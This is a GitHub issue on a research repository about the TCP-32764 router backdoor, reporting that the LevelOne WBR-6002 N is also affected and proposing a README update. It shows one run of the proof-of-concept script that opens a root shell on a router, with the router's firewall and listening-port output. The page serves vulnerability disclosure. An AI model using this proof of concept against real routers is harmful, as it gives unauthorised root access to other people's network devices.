LevelOne WBR-6002 N is affected too, but not listed in README.md

elvanderb / TCP-32764

some codes and notes about the backdoor listening on TCP-32764 in linksys WAG200G.

Other

1.29k stars 223 forks source link

$ ./poc.py --ip=192.168.0.1 --shell welcome, here is a root shell, have fun iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination netstat -l Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:49152 *:* LISTEN tcp 0 0 *:80 *:* LISTEN tcp 0 0 *:32764 *:* LISTEN udp 0 0 localhost.localdom:3073 *:* udp 0 0 *:23460 *:* udp 0 0 *:1900 *:* Active UNIX domain sockets (only servers) Proto RefCnt Flags Type State I-Node Path

As noted the README isn't being updated manually any longer. You may make a pull request and reference this issue in the 'LISTENING ON THE INTERNET' section, for example

diff --git a/README.md b/README.md
index 3cfa9f1..5674552 100644
--- a/README.md
+++ b/README.md
@@ -27,6 +27,7 @@ Backdoor **LISTENING ON THE INTERNET** confirmed in :
 - Netgear DGN2000 1.1.1, 1.1.11.0, 1.3.10.0, 1.3.11.0, 1.3.12.0 ([issue 44](https://github.com/elvanderb/TCP-32764/issues/44))
 - Netgear WPNT834 ([issue 79](https://github.com/elvanderb/TCP-32764/issues/79))
 - OpenWAG200 maybe a little bit TOO open ;) ([issue 49](https://github.com/elvanderb/TCP-32764/issues/49))
+- LevelOne WBR-6002 N ([issue 107](https://github.com/elvanderb/TCP-32764/issues/107))

 Backdoor confirmed in:
 - Cisco RVS4000 fwv 2.0.3.2 & 1.3.0.5 ([issue 57](https://github.com/elvanderb/TCP-32764/issues/57))

also would be helpful to know the firmware

elvanderb / TCP-32764

LevelOne WBR-6002 N is affected too, but not listed in README.md #107